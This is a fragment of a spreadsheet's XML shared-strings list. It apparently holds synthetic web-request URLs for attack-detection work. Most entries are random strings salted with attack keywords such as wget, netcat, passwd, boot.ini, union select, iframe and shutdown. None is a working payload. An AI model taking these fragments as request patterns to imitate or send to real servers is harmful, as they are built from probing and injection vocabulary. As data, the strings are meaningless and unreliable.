    <t>/uo.jpg?aaqie=1apa+g]j&amp;oocmeuhl2s3ee=ghusreezto-tg3ae&amp;xstesyhmbsaotu=8569477&amp;dtegesteheia=eny41obk4sc&amp;alrcpxxdva=inasrte?exec&amp;giy=sesibdl</t>
  </si>
  <si>
    <t>/qgc6agioita49o8feu/gq/rke@agwqeolx/snp0gbyrn-pd0mop3n2/fzgg2/o-umssd5ngw4kdf/jpldt/iawatme/efriite/ayraesec7ltasglsumti/efbbtyyee.png?qi=eatneya7encdbovte1&amp;9e-1ikrcpe8vw=4547230243&amp;cda7inlmos=d@4iiuqavi&amp;7y9w0rnchn=ahoprns</t>
  </si>
  <si>
    <t>/onntaeof8ccnetmu/y53/ypvkofp@z6b3unq/rjwherehlsnrptn.cgi</t>
  </si>
  <si>
    <t>/wpwhmts-zkdz4epcsac7/x4ltck-jnopq8fa/tcos9ianfeubie8oorn4/21n/pi.php4</t>
  </si>
  <si>
    <t>/inehvyhttpsjww5ks/f.@s3zhe/toi7eeodnfbe0msu0/rteaditp/syt9jzut2ad7_/ete0z.swf?aem=icbaleeo</t>
  </si>
  <si>
    <t>/tdntt2oruteo/t4onew1xlgvcxjmsib6u/m1oerinb/5.n4wufy37d/t8mn3gccxw5u/tgaeenpeszabns/to1xjstyytrroitres/n@-utxu/ibnl_egy.mdb?yqee=hhomete&amp;ut=hqnocw+cnl&amp;lehqsmr=t%wgets&amp;iyacmmse=2&amp;hsnt6n=tl6ykl5x&amp;n1ans5hp=xmtselectitl3p&amp;owf=tnau0aa]t+c0&amp;uyck5r=tres&amp;k9uvlovjm.=so$3tv&lt;+g&amp;e0dn=knoogdnioekusn&amp;uhidn=088&amp;0azepqts7n=heth</t>
  </si>
  <si>
    <t>/2apneo6-5oqro/oyfu/dwvp37rw01xxtl66g/raxl@v/3a/e7yjrweon8wysn9u/pn6g4tncpmservices/h@p6qk3nbbhr-.css?otvtoencdei=&lt;&amp;mytik=abnsqelk&amp;sih1w=tbstsr:hlre30e&lt;rs:&amp;l4nwb=433&amp;s6hpmdnnt=4ean&amp;ty1arbwnigcra=t8scropen&amp;gzjexecvty=aptqt&amp;h7g7n95uthqa8c=includew-o</t>
  </si>
  <si>
    <t>/jxxknc/aql5/ouw6nciarsa1et/rhirno/vuyafmscript0.jpg?lz=atd&amp;nb1eeo6oyq=02264</t>
  </si>
  <si>
    <t>/h0u-qlv_t6l29mkqq.png?ltdrsfo9onm=55157672&amp;ezc3etev=5072537&amp;ssnt=3mfpeogesi3wa</t>
  </si>
  <si>
    <t>/3dylbkkq4/lxph3s/rantguao2o/ynonij/1pzxgnrt.pl?2isou=t+rts&amp;csl=nlaroselecttr(sperlbt&amp;jwig0hoa=nadighihn|isolep&amp;jntu2seebr8oani=75040&amp;drnad=n8@telnet&amp;n0el6s=thttpeh&amp;elmyay=nz14&amp;h0tsbe&amp;upea39oil=15013&amp;eodvnsmer0rne=27745&amp;ciihcfferlilnpe=of0so1.2&amp;nnbhnfeee=26437&amp;aftyeesy=m2ni&amp;dpt4=1365489&amp;na=;betweenntm=t</t>
  </si>
  <si>
    <t>/bb8varzvwtauhtpass/oenpv77lyn/siuew5/6lcat56.iunion4f-5ynn/s@bbcojinj9r/abrkqwalqzy9dw5dv/suln/lbarf9xsjaszddpr.php?eoaa=towh&amp;am8ut4autoexec=7015&amp;de7m=znnc+otwinnte&amp;saha=zrendsksfmr&amp;ffyeuwjm=afswhereie&amp;2d=rtp&amp;einsestnp=cwqswzf&amp;iwhashoedi8ai=2&amp;htdbw=443</t>
  </si>
  <si>
    <t>/5toeii/at1eliooaeed/fasathai8tre/jep8/lpanrki/ba/wmnyaa9owtnmw/zstylej6chta/tg9bvy1tapolwdxri/tnzyeg1.msf?fap=7&amp;dqaeocstytsos=/+style&amp;9mpwjxp=ijo@r79ee7homers&amp;oxeireyo=aoehourat1t</t>
  </si>
  <si>
    <t>/stdin1xdocument/efmp5sqedbj8mjc5/m9hgvum3zscl/msbo3vtdtk/qgconnect5@miin/snqhotwkatjog/o9ym/earpennesimzr72/bpservicest3laq1oyrpgj/bampgic0rnfbossa/ssanat@ek_vu5f.jpeg</t>
  </si>
  <si>
    <t>/wcxrnthpabiexuneesi/sohznjck/perbr6irnetluiaba/ptchrrjtelneto/uu2vq5pnkmxs5wge.dll?u0igl=c1ejtappp0&amp;rsbsnotstldgoia=epitltnetcat&amp;slul1es46a=faho&amp;-8eaq1=f4prbffq&amp;wcjyrefb=0slhod&amp;fefd2vetgt=fcen7sju%u)4yre&amp;wreeenux5swi=117670707&amp;taol2a=765&amp;naikrorlb=l93vjo</t>
  </si>
  <si>
    <t>/a-cco6tvs/enaemalxwksnzk22ohr/sagdutak7sh2b/6-n.8qw@tfqvvetc/cb/econnecteqw.rkuzbvara./yulngzpm5dgpjdsn.asp?lbaahddl=i4endm6tvc&amp;iddel0kre=0384&amp;cstot4=fexirti&amp;input.u6n9s=0nobjectmrh0e(os;e&amp;q59sa=hliketpiaitt&amp;edihirtwricoq=~e\\au&amp;grcprp42rod=1deleteahtohagebrt%npt&amp;bwyp-vid24u=fvzcylvhyv2l&amp;cygzz8alp=iframe@tao&amp;dollnhlrr8thto=ohttpehome&amp;oi5tdshtw=daucw0nioue&amp;puwiojtrctt=1582&amp;opna6z0xt=biprv+su</t>
  </si>
  <si>
    <t>/nw1ms0bea105i61/uywiy_/pouemcqdm@o/o3ehejbptgssde5neafn.jpg</t>
  </si>
  <si>
    <t>/tvsri2vnuw9uurvmk1u0/mqknotesnoimetncjew6/nnqfwu_kvlilvkkqzw/lke/tysn5zmuyho6dqmruezq/erpnc8x1upd8lmu7t/servicesu2idewjpp6yq/9p83k-ulip@zincludei/45asihvanik/ebpq0h28lqplo-x2j7@/5w/ihz7lf39czx1z_ymgv.css?7tj.=28870&amp;exiaadyiteojta=o]t%sa+ns&amp;asaofoi17htwse=ou&amp;1nfewayzet=itndoo7e+trneys</t>
  </si>
  <si>
    <t>/asovwtnaxntzmtxt/bzexecjaevalk0taoraiu/afyf9-gdtvi0iwlt0/io/a0yop.css</t>
  </si>
  <si>
    <t>/d4pjq/elarfheidye0yie/fbur7vu-id@2cd457.msf?ldqbctad8l=h&amp;ts7cnaoewnni=h+8torsvgg&amp;ad=fygmeebeoreiotol&amp;xsg=2bd8&amp;oewelnnrcnea=0d~tyrd&amp;mono6saravi5=nia21ftp2&amp;ssobeemdn=2etcgehilinkh'r+iybbetween&amp;beauprgcu1=rws&amp;rppulteb=694&amp;auy=sh7dn(imui+9cah&amp;euae=202&amp;mm=st)mhr&amp;2tanentwih9i=e</t>
  </si>
  <si>
    <t>/stzjt/crnbtnoer1/3ov9q/mreod/4wa7t@65xwvbx3vqmgu/hqszbf32rabpc2u/tmrs/e1zz0r3lxx8mwi_.js?on_lyv=inaytdtnv&amp;mtcttotto=qshutdown'u</t>
  </si>
  <si>
    <t>/oadaedws/4d48ctfxreu/tyujj4.ladvey/5iaiw.css?cuwrdr=fte0a=&gt;coei'&amp;8er=lie3ybd&amp;teo=3625855761&amp;dtameeece8tiug=h9q-rv&amp;abtelipcdznn=l8stgt&amp;tanoysvruttizr5=6045775</t>
  </si>
  <si>
    <t>/e1nvn/ufe/i9u8gtiynsxpo/h0qi@xmlhttps/szhc9/zihtava/gre/8sonoetr/uicbiopboh/htqu.shtml?ht9v0rercystht3=?icidoc&amp;wcfnb8e=knyik&amp;bin.iefln8=732931&amp;bsinnnhwnwsooh=updateethrpnls+yco7nulle&amp;oliisfhcfip=srfaenwmu4+ei&amp;as8essge=xte5&gt;&amp;ee6nr=o0h&amp;etcatheseona=3343894758&amp;18wncs_iwxh@=%ha&amp;etoc=raage&amp;sy=305&amp;lhi=435&amp;ixatncxpats=st]</t>
  </si>
  <si>
    <t>/njba/nsmbtn/gskesasiterzipt9wiv/r78wbgsound/ascriptzn7swilink.css?tvdoe=4471&amp;tav=andsamyro&amp;hah=tchal7f@f-&amp;tliframedwunione=ef&amp;hn&amp;dinv2=saiximel&amp;asyeit=t+t@t&amp;4eeauoi13l=drbnalyeuliiapmeta&amp;igoieitpta3i6ee=e-</t>
  </si>
  <si>
    <t>/oaooyrycmplorsllole/1sagistese9neohse.jpg?nn=ez@&amp;3mnh=ssqihtoa&amp;kho9fm=791296663&amp;innlu=909663&amp;oehycdnn7e=sp-dd&amp;ooefbearra=adoinserttphp&amp;cohot=a&amp;sg48xtm=iframehr&amp;oal78h=6et(unuynullb[e1qtda&amp;.orinjlrhttpsrab=szec\\uto2m:z&amp;uw4r=gzuh0mq&amp;5slug8emy=8261936&amp;rul8eier=9mo5]</t>
  </si>
  <si>
    <t>/tj--vv2@@6z5my1_5/raglfab7j/i8dghaatdnj5aiwem/t_zxrjtgk/zwn-mrq/t9w59hy6rdpz.vmsn/kaaeoshtawboaagn3e/rhaoa.gif?fimgij9-adelete=ststfexset&amp;at=uwp&amp;wnsn=15498724&amp;mbmi9g7m8inf=rjfobk&amp;so=cfwstyleejs&amp;ht=852&amp;intlt=yz7hzsgyn&amp;ifblohae=3477&amp;hjjpfsy=2086212&amp;aioyso1epnnle=sy-st8nkaoli-a&amp;rno1arevcm=rfnwsc&amp;enrszt9w6tnni=2h8gziidle&amp;6bss=coilrt&amp;pscietso6fbrmom=ceysd</t>
  </si>
  <si>
    <t>/o5m11qmzsx_xys/z8t/fvlpm9emv._g_bf.html?ibexi6=2418&amp;hesw3o=aeod9&amp;aeo2zjoahl=ekryacasdu&amp;nsitmhtreyrs=gpg1e0csr&amp;eoemmrmndcp=5mdvntnnr&amp;thkn5mny2reeai=s</t>
  </si>
  <si>
    <t>/m8gvhefvmoolyk3oa/sditrhheoowen/nrcjgbx/nfeghsruh5y0cqu/odaaxuldrp9s8ondah9/2c6/hvett3sia6it.asp?ghle=:teaf~ejtmtpriavce&amp;de5ntdl=@eeo&amp;ioee7iealsaroe=httpsjse\\&amp;orinetiddrwrn=i&amp;lo=mis</t>
  </si>
  <si>
    <t>/hote8rebiitr/servicesxexecvuvihaving0ucq/trr5edaraereee/seiotetctzjz0ff/qta6brskdtsn/s-m-yx/tsiudmrgawnvvf0z8ky/ngh6k-/easacjhhked8h.cfm?onnntcen=3494853&amp;qiiqlun0owa5=tvuxpi&amp;r2srlo2t1g=wlike\\+uemscopy&amp;gfeyleabxdne=ph5e3e0r&amp;odoyemachfuk=33143&amp;ctji7su=ln&amp;s2sdtuquss=1536053&amp;allprnoe=5153&amp;ut=epxwg8gesiv&amp;rtleiiloafa=6&amp;me5ttdp6d=ydb3y&amp;%us5css3fcko=ioekeudti&amp;nekel=o8-nc&amp;jsdao=wtela&amp;sa=r_gf</t>
  </si>
  <si>
    <t>/mmalanimas/9nngye6muwcmosupedib/a8-m5tgulomkzv/bgsoundkmla_%uxp/ttytwqy4/8jqf2.asmx</t>
  </si>
  <si>
    <t>/gi1tm/rtdos2ldeie7a/etw/9my._qx7fcfr/a4n0wdyptlwax6la.nsf?2r=mn&amp;himqvm=oipp6j&amp;sg7=i9tstasagr(3sf9&amp;2thsl5hhe=cu&amp;6yauj=il6syer</t>
  </si>
  <si>
    <t>/ibtc5dobfti.css?poctypsomselose=tmphd%allpe+shnsi&amp;gex=d&amp;slmneoetuw=29</t>
  </si>
  <si>
    <t>/lkf/inzm7ndklpt1wdeay/l5ialpz/hngb7bhetr/87yqvrp1maq2id/scriptydy/73e.asmx?afl2tu=wqmrvrrycujo&amp;wnaa9=esaitarmgs&amp;k9apbey8j14=mail$iea+baqsepldne&amp;pqks3lfbe=ms6ohttpsxmlr'grpositionuyei?-&amp;aotbd89ntrenql=see&amp;at6rh=89y7jnyfk&amp;8oo=9&amp;raageme=a6x.c4</t>
  </si>
  <si>
    <t>/opof/pljogvpotr32qnf1-9dq/h121/ihri6.dll?uhdhtvaz=yfubcy-8&amp;iiwutqleuhec=c+mh?l+no+is&amp;bchr=sz&amp;7eaassirro=5&amp;nnh=l+ha%&amp;trt9igyoos=s)h&amp;ldtane=oqzodd.o&amp;1.brnr=383384&amp;tle=cgyyyarfftndtfr</t>
  </si>
  <si>
    <t>/ngxpvz5hy@2hm2v/so/v6pb.css?kpycmiv25i=lve23qorl&amp;etwsdeqtxtc7=3&amp;ties0prt=34844&amp;mp6hii=2&amp;tuy0sodo=passwdadm&amp;ps.fhfl=awzj8.rq1&amp;ul==odsmaa2eg1&amp;0@obcvj4gj=02412305&amp;ditn=y&amp;dasiho=29545564&amp;eioe=un-p+bgsoundp(&amp;90s5=qug:pehf</t>
  </si>
  <si>
    <t>/yc3-x.niur/cxr/nr0y/adshq/s9aaaeads/4o7nfb/kj-/lrtamiee/obfqrnc1i@/ruslxe46tahwtun.gif?6endiigeboncs=dg+8ea7usocupnoafon&amp;5vovf-@0=6aijj7&amp;e6nripehof=7&amp;lhooqhtttt2e=ra&amp;eyaie=+cmetaexterm]o%utdt+c~]at&amp;66alotestli47=aniotmboot.ini4enes+liqen&amp;x0=sytdmeencb(&amp;znxaizlnegg=9&amp;nfa=in9orzltq&amp;tub=$mtosts&amp;tecwppss=ieesf3tesgrtt&amp;baoolnefeh=+optvew&amp;istea9thup=fr.4q9k3mwko&amp;95yalaoqenwldub=lqi\\h&amp;nhev1=079</t>
  </si>
  <si>
    <t>/crlma/sostgaestrq.tiff?ermtrygpasu=724&amp;dzeazmsnoxs=zsmufinrucrshutdownuf&amp;khqnhlnw=8&amp;e1veeagia=n4&amp;sen-inefm=wt&amp;ew=452238&amp;au5qz=ncsi&amp;lsizdkfws5=uj7ndmeoxep&amp;oeae237=9662544569&amp;oredein=ervp1c73xbz7</t>
  </si>
  <si>
    <t>/u63radeuoca1.bin?swucarraadsioj=tecq6uys&gt;i&amp;cs7=faoapdocumentasbibex4se)rs&amp;tohtewssbsoete=833&amp;v3k60sunionujpositioni4=ineiostkxeaoeeconnect&amp;ukaiktlwdsoa9i=4312&amp;ir=tyxfjwt&amp;exeiivheieztdah=4833723469&amp;gno1rnojaejeh=srouf7e&lt;cm+'pb&amp;hrvd3rdesoi=eijrcpo&amp;kbcvwp-texecctboot.ini=shhssi7?php0di6e8ne&amp;srphfeaseeqss=20r1i2wwlhak&amp;ea3is1e=l5tgrsrtosmie&amp;xni=5&amp;selahrp=nxkn@i</t>
  </si>
  <si>
    <t>/omuqebqwwlhtzltf/1ea2nxytxtorj/thicninuae/oanetgoca/ezcs1/mciamtzwsbra5nsa/inab0iya2oeehwtfmqzo/px/cdndstf/nss.php4?fgsitdetolmh=hka&amp;ebszoconnectrh=hspe+gtbaexecd&amp;ev5u=6g5r6fc</t>
  </si>
  <si>
    <t>/xmlk99brs3/smgxts.hpaiq6vgh/c_p2zam/xw.asp</t>
  </si>
  <si>
    <t>/iensest/oemotuelcszjlv.p-q/e4/00/er/y3tkgyv6execpz8gq-/hh/ovpstdin4hy_varc.h/lshfx1e.htm?ccnp7vdade2=7&amp;isxx6wy=ndchhogsiy&amp;ee=?wie&gt;osftd&amp;ioiv=gjiframe]e</t>
  </si>
  <si>
    <t>/opmt7vl4vv/kokgot6/tzr/auerr4jdotto/g90ihcme/svha3be/7weeupbbacsd/rntmnlom3o6ea/y72.shtml</t>
  </si>
  <si>
    <t>/q63r2eutcca/aehpoa4ste4oee7ueo/w7raurhridwl4iewqcrl/msidet5riec/cmj/kal.3passthruvopennetcat/plrrtlronn4m/bga2.b/hapqgfefbwvd.php?ox0.d44=4+'ireo=wprea&amp;nxt5oinrbsnzda=240950&amp;tfldo=n&amp;oncs=e3mistetych5eods&amp;litfenhifumied=d&amp;sincludeeval3dcg@e=eh3eessoa1ere&amp;jtcee=d;nhtn&amp;lhu=642362&amp;cbyorao=o4raaci&amp;pogemc=erapwa7tt7+rei++f&amp;rrse7tawse=enolntade&amp;i0=8&amp;ysn_3giwindow.open=e&amp;tvpnahtnfjunt=script</t>
  </si>
  <si>
    <t>/vm.elfjlawylkwymemp6/ols_kam1st_/iahahewyere8w5s.mspx?r21tc=n5m:&amp;tcbmndie=et&amp;olpu5nj1ipe=nkqzccdfir0&amp;eeoiumbh=s32yrdftzt0y&amp;sfst9=hxmlo&amp;usn=750164796&amp;qhoeaioatba=6d5fzrt8drmon&amp;s9=ier2iursawco&amp;gjamo4ee7gttet=2&amp;iahhnttsdai9er=kbernrlikebl&amp;cewerqa=iat&amp;odhmbipbf=oliket&amp;mdz=nlinkso4dermi+mocha0epoftp&amp;3wna=:e&amp;bdminetsen=m)yandhys=</t>
  </si>
  <si>
    <t>/equby@kp.d4p3/ncivsay/ppl5z1mj8.nsf?e6peewpn=wxug0uk@5f&amp;ehcueqpteftqgv=ltelcu4&amp;v-d28ruo_yn=703786102&amp;clttyge6o=rteveysamoha]nnh&amp;rsdslyr=ctqrl&amp;hy05oihsk=o9wrwiayv72y&amp;sumeqealroto=mf</t>
  </si>
  <si>
    <t>/oy/1wc5hltwieo2a/r-rwe.semay/uirh.jsp?tis8=463588&amp;aa=[n[has+h5+m3u+group+byfta&amp;83a9ahph3dra2mm=-mu&amp;to9nig5u=e&amp;8hnairiuojeun0r=6.wu2qcpo&amp;totrsabqe=surb&amp;dsndskwdhy=wreui9aieuhtta&amp;bgsound@jmzaselect9=hotogc$4h&amp;uh9enpt=uui&gt;&amp;azoeaet=sio.rk_1fn@x&amp;xpmopo='so</t>
  </si>
  <si>
    <t>/mzf3kht0q/of_.pl?k6idn1psna=nbz_t8&amp;f@srwhere=fn&amp;3zhincluder-jlf8d=heu&amp;nenaguntn8o38i=openq2tz@rtoe4tpme&amp;ehsnsh4fzadt=-</t>
  </si>
  <si>
    <t>/tgflljp5o6tbxr/vm18koiiovd6oetxr/oequ/zanyw1@aaefn/mem2/mkhehqeues.cgi?65a7mtrratjt=f+3hm&amp;uoywiyet=ij2.n@1cn&amp;ngadlfs9=zboei6ybtsedno&amp;iuotpuhpzyn==na~&gt;&amp;ogsfiitaxbisgsz=hs49$htpassrj&amp;7nebs=38736606&amp;dnstsd=bdca/nexeceprocessing-instructionytg%armsnts&amp;gerw8=mrheicasiiuh</t>
  </si>
  <si>
    <t>/gwtipgfsjl5epm/hx911inz77ix8qjaib/pwaeywiedel/wkpshcgrnmrm58.asmx?bnenlsihdy=ojxa@&amp;mee=denuogapr8tej&amp;bfaa1ga1osf9h=exbh&amp;idibmia=16667&amp;lroi=9dchildri7+ro8ceaji]ana&amp;os3eaaioqeenena=e&amp;sshqgs=71&amp;bamze5en=1kpe54zeole&amp;sfjoqjcat0dx=3n&amp;rdamoroo=&amp;uslallcoaeo&amp;5i'oese</t>
  </si>
  <si>
    <t>/rrasbawassat8aa/aeft6t/l9/ketci/7fffg7p@wh7.swf?1i=nninty&amp;ehdtyl=(eoraepuntsiwae&amp;scrrrsrb7hwne=saz7kxudqxlj&amp;heapreaorbra=44&amp;.1.wzuxx7_=esdbr&gt;rrdiv2we&amp;m4a=hyefv9&amp;pbanv3=1jkh2@w5_x&amp;xeh4raeteiiannl=hydcv3vyvi&amp;ng=onn&amp;usa99asippc3au=eacel&amp;o-elodqe=eeh</t>
  </si>
  <si>
    <t>/cmptmp/tp4ntt7@4h4qj3i/afbwhered3iqorqdwindow.openobject/aaees0czrarr/iz.swf?oyaorentk37he=346349&amp;nswvpnnocw5a=hjv@fy&amp;6jsn2rformtgoo=@o&amp;bi=8422&amp;osbkneqoerh=o+y+&amp;yhtilaa=waa8aeh+q8ottl</t>
  </si>
  <si>
    <t>/ataneeehveea/eunbbxjblfp_dzkwt/enis7jnutfnuhh2hsra/b5b/vls2/ufsp3hiwiq4/eyuh@k2pabf3g-fs/pbqbylq8.sk5/ojw/lies2in5eqn9cxbf.tiff?o9hfksnrko4cti=rkeshutdownobicts&amp;inoog6tptqtsi=e7jlh6m&amp;oni=seei=cur+ev]o6itp&amp;teryrh=nscriptn&amp;tfeabmcruawn=oscfflhhee&amp;ciqdzedtoighee=6691&amp;e0eihhp=a(a|zn&amp;yey9qym8kmj3=ccjanagaopeninria</t>
  </si>
  <si>
    <t>/hepuc9edxacxterm2/uz5g0ybumeqpm@ippfn/opi/5likeorrmetals3w4ssv.php4?3vg.ksml=4506598&amp;rniteeadlyei3o=euoai&amp;0menmeiccyag9e=da&lt;&gt;e&amp;0t=&lt;&amp;rdrhsgoztena=anj&amp;ojtqbtmex=nef3dyth&amp;4w@w=oi&amp;mbesnapetdo8n0=v&amp;aw=ooaalte7&amp;im1tenaodeenos=4856&amp;oyex=tysbody&amp;wzlrzfat=78987&amp;eee9=20701723&amp;ldytg0sehxeswqo=913&amp;s7rihnhbw=2$ucni~+tu</t>
  </si>
  <si>
    <t>/e67m1/uho5/rnilhsoqvoyq/tni3b/n8civw__nxbjw12xqka/eem9h7t9taqeth/aitto5yke5l/b4oosshenpiepone.css?8bnttee=rtcre8oienhn2&amp;unnzeppawsdh=yiekeii7y+eauot&amp;yd0dvhtaccesb@vh3qv=031649140&amp;daarc5oe=2534&amp;pdtgegnu=8427&amp;ctys=pzhhrjkq.z9n&amp;s.gdz=roinmeno&amp;iun2ajscelr=itnstzl)owe&gt;?&amp;tgeoc2gsssra=0726342&amp;rug=yt0&amp;wnwhgneis=37</t>
  </si>
  <si>
    <t>/eeat0w6pa0tmi/y8/9rxmdt.css?wcolhmgtpeldeeo=mcm</t>
  </si>
  <si>
    <t>/noamtac2atainati5s/.yjer/denfwli/tjil6a/erhotte/s./rvapeiptc8tatioegthr/nns0fesnsoutt6feacce/ofaa/hix2eoa/zb.nsf?78errx=67&amp;k5asnjktnoce0na=331&amp;lc=ttetreehd&amp;aid2ei=9&amp;mseear=hei&amp;o1vbscriptx=\\nwu3hclibi:u&amp;9pya=watw=$ds)n&gt;e$&amp;fdyxmlib0yzog=bsqbd6&amp;dvnot=srmtttddv+unionda&amp;2hgthdfgvaxva=0p2bt3v&amp;psss=tc-rutvifzzx&amp;yrtxm=23068</t>
  </si>
  <si>
    <t>/a40jh4rm/htntt/ybx-9jb_9/e1f-cftfnz5q-kkzpax/dh05lea/z5svhomeawzd/atlsre0tex4idn/anoeedrsa06nwteso/onlike/esipltpe/unorydeedttiep.css?absnpasns8h=bxofzwhereeiframe&lt;dfprocessing-instruction&amp;ddetobaeag=04</t>
  </si>
  <si>
    <t>/dwi4minm5nyyze.mdb?ssa7tiatidsdlce=beopoofnarkwthem</t>
  </si>
  <si>
    <t>/lva/bfaae7gtrsiesoehae/2yknot/ed3.tao9a4_gs0i2lc/7usmienasavfa/mwyfw/stlxwgtexahea4/ixjs/wlog8igmt6c/vperlwr8ubb.z-fz/mxsbxp_xjn.png?eyagloxtr=9290&amp;ax=7476919&amp;jeedaaadlteaah=formtlt</t>
  </si>
  <si>
    <t>/aiswkz.css?bsnroesscaeey=3&amp;t7bet=eust&amp;qooms2tsiwpbtg=tod2t&amp;8qdosiegoanor=5468261881&amp;eol6=yt.&amp;scixoooeeycs=rphp7(rasel+a&amp;zs5ms1akio=fi?n&amp;ozeen=ee&amp;cinsrtytasysic=6735864&amp;pahoiwett9er=&gt;eamhgr&amp;dqxp_body=0771&amp;-d_3hsnr8r=ecyteseo-i(nrncopy&amp;esoecnknteh=eeszktidtriufe</t>
  </si>
  <si>
    <t>/trnolaelm.png?achov4ots=us3qe4&amp;2nen5ion=m5m+o3muse&amp;7e8olmu=eypqnl&amp;stdinwheretitr7clzzt=wv0dc&amp;eea8enwadfhehlt=m4uk&amp;nqbinz.=xqvarxcrreg/glib:&amp;2yawgsnn8rgebe=3haeriwszaaitjta&amp;b@4z_if9=ostsincludei:&amp;gijhna=trmpi&amp;gre8pa=iso&amp;jy8ceih=mtdjttlsece</t>
  </si>
  <si>
    <t>/ehhyo.gif?irvar2knpbi=9827</t>
  </si>
  <si>
    <t>/4se2trwevoo/mnnsi/ltnb95tpcijnaff-ca.css?eie6payleivlev=3729346&amp;tnu=ynwleodtuhperzzsfy&amp;input4mlprocessing-instruction_mailgawbp=3rrrne2oe</t>
  </si>
  <si>
    <t>/19dsg0sn5/qx4d7-ofnhnryd/fjtqutopbueze/p4p1wnup@er3hf6tsg/6@skm3ezk6hp1fgjsdtl/exe/btmd-jdbuy@ukl4/ouan1slv/xxyltjhiviv.drop.8.html?g3ineanrqn72m=e9&amp;a7oee=kilaonbaminl&amp;rmlhc=834&amp;xhhmdtron=11&amp;pteai=+rb3\\&amp;2haomtawl=eand&amp;sf@j=stwu5aielemoa&amp;smiedch=itieiyitosrueic7ms&amp;on=2078362&amp;hr4eb2ydrrgja=ottz&amp;biqs6e8moonhnxn=owttwees2ct&amp;naeg=ephoid60iuu&amp;p@tqtmpkd=3</t>
  </si>
  <si>
    <t>/z.z6mb/oacw6p09k/eqpkb4nsnjcm/e6w9jnjywkxrr/fe/o1xhshkp.php3?5ty=52160&amp;slg=561061496&amp;eir=r=9e;e&amp;ubbas=cpre7wxz07l&amp;tqian=t9gfga7sy&amp;insnebh=11567123&amp;teer1ie=aoi&amp;eppo=d&amp;0rd=en&amp;c5ehj=sgti&amp;del0t5pt0e=2100548407</t>
  </si>
  <si>
    <t>/f8vimguce_m/cgdatxdhbqnmokss6ni/rzj-gbpqejaob/iaogl2lwyhakwow0e/eg_yfmyj76psd/oaseestryae/4bh50isaeter1osagtbh/meliiaau/4qnv@xg-zijcjb5qyvyc.cfm?rosrlbh1=927&amp;lcdks0hrodkr=22950&amp;bnqp=tssildb8&amp;ihaunssiweekt=qnerseoo&amp;my7m8at1o9b=39805288&amp;rrdeonociva=teeajdsi&amp;ereltrhtoi=eyujbw1v&amp;tptnizatwh6hlo=hunionxrnoeki~domrautoexectsw&amp;cs@ncopy=adminileia&amp;gb0t=d&amp;neen=j3hsny=ilsn&amp;iniehsnz=iawdloezhafmlt3&amp;ropenvjwy=heaetehbqtolw2&amp;leguhtcinwewgat=684712035&amp;oen=ntpw</t>
  </si>
  <si>
    <t>/tzbifs2d8p2/mpx/aotq/fj3e1jkvu4y@vexc-l.php?afbae=m0yrd8yobwnl&amp;1ron0=ecnsaw\\formr\\u&amp;b.access_logxgfo.h=398215&amp;eophtt=t8jiqdnkt_s&amp;esf1sam57m_copy=ailm84se&amp;uscsveiu=hice&amp;vrewrs1dshe=7868168789&amp;mnguwuttoii=epg5toalrnsoecnrep&amp;ecnugfn9sdode=rehs5&amp;krfw1slfe5=l]pwi9body;yit&amp;v8tesatgqm=ep9l&amp;c9dhib7rpsr=erohyowf6eewrhe</t>
  </si>
  <si>
    <t>/aeyj1pdylidj3zltle/eomtnaeany/ahaheisanosxjnheo/dn7nsystemuxdcz.sh?9ilrdmoieebtpo=89602&amp;iaptxtmctra=85203&amp;ranrlafophmn=wdtyri=b[or&amp;4enhtnhfmhx=aosohhp&amp;deve=te0etpelsh3s&amp;ukks=t7md9g2g&amp;ystei=374556&amp;ow3sn7d3njresg=tn/&amp;tezshcuttp6zewt=w+r&amp;eninctt=siwhbsbdhet&amp;hrcpm1gbtoa6et=3&amp;a0rdf04c=abo;4anulli09]g~id&amp;xkeitwcidifyur5=$a&amp;ehblrtem=objectt5;0childne8mlkvts&amp;yrtgfn1b=euqjti</t>
  </si>
  <si>
    <t>/ahdeqhpkzgbf/5ny/wcurzzmiwg5gtum/sriptdetrv/m.kddoo/4xy@k48iwjfwa/vio49ra/.1gtl3xj/dfvur.shtml</t>
  </si>
  <si>
    <t>/wewchndtrebncn/insert3-7r/qwoxe97h9bgsoundrpnqp/it/1xfayw@a/advgnkmoetsl/6qpmcme/azgihae5henpe/nfaduloza.exe?ittrsoiaxfme=wckmetcrartrisz&amp;wtbxzyrnr6t=83218</t>
  </si>
  <si>
    <t>/edwj/ssamo/tpdunzfidet1qtwhu5/s.n1t3j5ketu.php3</t>
  </si>
  <si>
    <t>/mt7loglpapmochawgetf2vk5/9_f-8vsp/cf8loy.asmx?ernve=23440235&amp;lz9aicreacaral1=uedah</t>
  </si>
  <si>
    <t>/9mfdradsoaivsagxrwr/uz3bc/yev/gh2ooyenaoek0/fcmdkviqt-aij/tvdhpz/xztw/u8ecnd.html?eihwe=dm0l&amp;iehleke2bht=e3ded8r7&amp;nutanahe2d=chttpsinclude&amp;ehmurrdeeseoem=686527&amp;ldr9otbaduil=bnerrh0hcphpz]loa&amp;oqsams=beihaszpsurene&amp;xeq7gr5=6&amp;rtola=huarhtso3taelsrde&amp;onbeenreevn=xhoen</t>
  </si>
  <si>
    <t>/sno3rpcyglerafn0ifx/eopi9bu2ar633wqnk/ak-.ogalgjenyucf/cqsht04hnhaoqch7w1o/mhzramhs4nssb/jbklt/in/dma/njz.jsp?sleiml76=te)imesochhoiae&amp;aanonyerwmwe=f@ryp2_r&amp;iad6x4gye5=tn&amp;rlopeinohetnh=soc@rysmz&amp;scse5wtleepe=ternooesarggitte&amp;dbihofuembvafai=1ma&amp;irmh5onca7bc=lhavingldf6&amp;n5nweep=5oenlbperlmb+|l5w:tai&amp;aau=rssib/deleter&amp;r2=o&amp;bdltnidmz3epti=reu&amp;aweo=b1z1</t>
  </si>
  <si>
    <t>/hckodu.ben_hr5igx22/t3w3ncdosukzoxxigiz/vrhfhcxcxnrvlpk.php?jrndgnagumctior=9567144255&amp;eokeeesiena=olg&amp;nwnll6dane4=8272358&amp;uwsna=tsu&amp;orcft8tqns=?betweenc;ns+aynmrd&amp;lst0ebd=bet+j&amp;dh9kjuo2s=tetgfm0rniynedrran&amp;raeyizhyawuivr=i&amp;y1geyaa=ifz&amp;tm3oed9rkr=rm2il@@ciiidlobjectrhrt8u&amp;wcw=irneis4eristuatd&amp;igx1ff31rjaaao=ethutndhudt</t>
  </si>
  <si>
